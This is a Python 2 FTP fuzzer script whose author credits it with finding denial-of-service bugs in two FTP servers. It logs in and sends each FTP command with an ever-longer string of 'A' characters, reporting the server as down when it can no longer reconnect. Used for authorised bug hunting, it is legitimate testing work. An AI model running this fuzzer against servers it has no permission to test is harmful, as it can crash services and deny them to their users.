This script helps with bug hunting. For example, I found two FTP vulnerabilities with it:
XM Easy Personal FTP Server 5.8 Remote Denial Of Service XM-ftp-dos.txt
FtpXQ FTP Server 3.0 Remote Denial Of Service Exploit ftpxq-dos.txt
[+] You must use Python 2.x
[+] fix cmdtest loop
#!/usr/bin/python
import socket, sys, time
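banner = """
##############################################
## Iranian Pentesters Home ##
## Www.Pentesters.Ir ##
## PLATEN -[ H.jafari ]- ##
## Sample Ftp Fuzzer version 0.1 ##
## Code by: PLATEN ##
## E-mail && blog: ##
## h-jafari.blogspot.com ##
## pl4ten[at]gmail[dot]com ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##
## and all members in Pentesters.ir ##
##############################################
"""
# Python 2 script (raw_input, str sockets). print() is always called with a
# single pre-formatted string so the output is the same under Python 2.
print(banner)

# If the server does not listen on the default port (21), change this.
FTP_PORT = 21
# Without a timeout a hung server blocks recv() forever and is never reported.
TIMEOUT = 5.0

ip = raw_input("IP: ")
username = raw_input("Username: ")
passwd = raw_input("Password: ")
# The size limit must be an int: in Python 2 an int always compares lower
# than a str, so `d <= byetesize` on the raw string would never terminate.
try:
    byetesize = int(raw_input("Max byte size: "))
except ValueError:
    print("\n[-] Max byte size must be an integer!\n")
    sys.exit(1)

# Command verbs under test ("NLST" and "XPWD" were misspelled as "NSLT" and
# ",XPWD" before, so those two verbs were never actually exercised).
cmdtest = ["USER", "PASS", "LIST", "MKD", "ABOR", "CWD", "ACCT", "NLST", "DELE",
           "APPE", "PORT", "PASV", "NOOP", "AUTH", "HOST", "LANG", "FEAT", "RMD",
           "SIZE", "XRMD", "XPWD", "XCRC", "XCUP", "TYPE", "RNFR", "QUIT"]


def _connect():
    """Open a fresh TCP connection to the server; raises socket.error on failure."""
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.settimeout(TIMEOUT)
    conn.connect((ip, FTP_PORT))
    return conn


def _reopen_session():
    """Connect and log in again; raises socket.error if the server is unreachable."""
    conn = _connect()
    conn.recv(1024)
    conn.sendall("user %s\r\n" % username)
    conn.recv(1024)
    conn.sendall("pass %s\r\n" % passwd)
    conn.recv(1024)
    return conn


try:
    # The original connected to an undefined name `hostname`; the NameError was
    # swallowed by a bare except and always reported as a connection error.
    sock = _connect()
    r = sock.recv(1024)
    print("[+] " + r)
except socket.error:
    print("\n[-] Connection error!\n")
    sys.exit(1)

try:
    sock.sendall("user %s\r\n" % username)
    # Read each reply so it does not queue up behind later responses.
    print("[+] " + sock.recv(1024))
except socket.error:
    print("[-] Username error!\n")
    sys.exit(1)

try:
    sock.sendall("pass %s\r\n" % passwd)
    print("[+] " + sock.recv(1024))
except socket.error:
    print("[-] PassWord error!\n")
    sys.exit(1)

print("[+] Start Fuzzing...\n")
for cmd in cmdtest:
    # Restart the length for every command; a single shared counter meant only
    # the first command was ever tested.
    d = 1
    while d <= byetesize:
        payload = "\x41" * d
        print("[+] Send evil string %s %d\n" % (cmd, d))
        try:
            # One well-formed command line: verb, space, argument, CRLF.
            sock.sendall("%s %s\r\n" % (cmd, payload))
            # An empty read means the peer closed the session.
            alive = bool(sock.recv(1024))
        except socket.error:
            alive = False
        time.sleep(0.5)
        if not alive:
            # A closed or silent session is not proof of a crash. Calling
            # connect() again on the already-connected socket always failed,
            # giving a false "Down!"; a new connection is the real test.
            sock.close()
            try:
                sock = _reopen_session()
            except socket.error:
                # Record the triggering input so the finding can be reported.
                print("[+] Down! (last input: %s with %d bytes)" % (cmd, d))
                sys.exit(0)
        d = d * 2
sock.close()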